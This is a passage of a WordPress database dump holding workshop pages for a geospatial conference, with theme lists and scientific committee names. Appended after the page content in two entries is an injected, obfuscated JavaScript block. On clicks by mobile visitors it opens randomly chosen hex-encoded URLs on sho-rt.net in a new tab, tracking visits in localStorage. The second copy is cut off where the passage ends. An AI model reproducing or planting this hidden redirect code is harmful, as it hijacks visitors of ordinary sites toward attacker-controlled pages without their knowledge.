construction</strong></h6>\n<h6>\n<strong>⦁ As-built vs. as-designed and evaluation of geometric conformity in 3D printing</strong></h6>\n<h6>\n<strong>⦁ Computer vision in digital construction</strong></h6>\n<h6>\n<strong>⦁ Automated risk assessment and safety hazard identification</strong></h6>\n<h6>\n<strong>⦁ Increasing automation (IoT, Industry 4.0, etc.) and remote inspection</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Frédéric Bosché, University of Edinburgh, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Pingbo Tang, Carnegie Mellon University, United States</strong></h6>\n<h6>\n<strong>⦁ Shanaka Kristombu Baduge, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Markus Gerke, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Lucía Díaz-Vilariño, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ Davood Shojaei, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Qian Wang, Southeast University, China</strong></h6>\n<h6>\n<strong>⦁ Diogo Ribeiro, Polytechnic of Porto, Portugal</strong></h6>\n<h6>\n<strong>⦁ Uwe Stilla, University of Munich, Germany</strong></h6>\n<h6>\n<strong>⦁ Richard Andrew Buswell, ⦁ Loughborough University, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Debaditya Acharya, RMIT University, Australia</strong></h6>\n<h6>\n<strong>⦁ Fernanda Leite, University of Texas at Austin, United States</strong></h6>\n<h6>\n<strong>⦁ Norman Hack, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Higinio González Jorge, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ António Aguiar Costa, University of Lisbon, Portugal</strong></h6>\n<h6>\n<strong>⦁ Hossein Arefi, Mainz University of Applied Sciences, Germany</strong></h6>\n<h6>\n<strong>⦁ Giorgia Giardina, TU Delft, Netherlands</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Digital Construction','','inherit','closed','closed','','2712-revision-v1','','','2022-10-14 14:00:08','2022-10-14 14:00:08','',2712,'https://gsw2023.com/?p=2788',0,'revision','',0),
(2789,1,'2022-10-14 15:31:01','2022-10-14 15:31:01','','3','','inherit','open','closed','','3-5','','','2022-10-14 15:31:01','2022-10-14 15:31:01','',2537,'https://gsw2023.com/wp-content/uploads/2022/10/3-4.jpg',0,'attachment','image/jpeg',0),
(2790,1,'2022-10-14 15:35:02','2022-10-14 15:35:02','','3','','inherit','open','closed','','3-6','','','2022-10-14 15:35:02','2022-10-14 15:35:02','',2537,'https://gsw2023.com/wp-content/uploads/2022/10/3-5.jpg',0,'attachment','image/jpeg',0),
(2791,1,'2022-10-14 15:38:54','2022-10-14 15:38:54','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours</span></strong></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\r\n[/vc_column_text][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]\r\n<h5></h5>\r\n<h5><strong>Themes of event:</strong></h5>\r\n<ul>\r\n 	<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\r\n 	<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\r\n 	<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\r\n 	<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\r\n 	<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\r\n 	<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\r\n 	<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\r\n 	<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\r\n 	<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\r\n 	<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\r\n 	<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\r\n 	<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\r\n 	<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\r\n</ul>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><strong>Scientific Committee:</strong></h5>\r\n<ul>\r\n 	<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\r\n 	<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\r\n 	<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\r\n 	<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\r\n 	<li>James Haworth, University College London, UK</li>\r\n 	<li>Tao Jia, Wuhan University, China</li>\r\n 	<li>Xiao Li, University of Oxford, UK</li>\r\n 	<li>Chun Liu, Tongji University, China</li>\r\n 	<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\r\n 	<li>Francesca Noardo, Open Geospatial Consortium</li>\r\n 	<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\r\n 	<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\r\n 	<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\r\n 	<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\r\n 	<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\r\n 	<li>Donggen Wang, The Hong Kong Baptist University, China</li>\r\n 	<li>Martin Werner, Technical University of Munich, Germany</li>\r\n 	<li>René Westerholt, Technical University of Dortmund, Germany</li>\r\n 	<li>Hangbin Wu, Tongji University, China</li>\r\n 	<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\r\n</ul>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\r\n<ul>\r\n 	<li>WG IV/1: Spatial data representation and interoperability</li>\r\n 	<li>WG IV/3: Geo-computation and geo-simulation</li>\r\n 	<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\r\n 	<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\r\n</ul>\r\n&nbsp;\r\n<h5></h5>\r\n<h5></h5>\r\n<h5><strong>Special Issue for the workshop:</strong></h5>\r\nThe authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 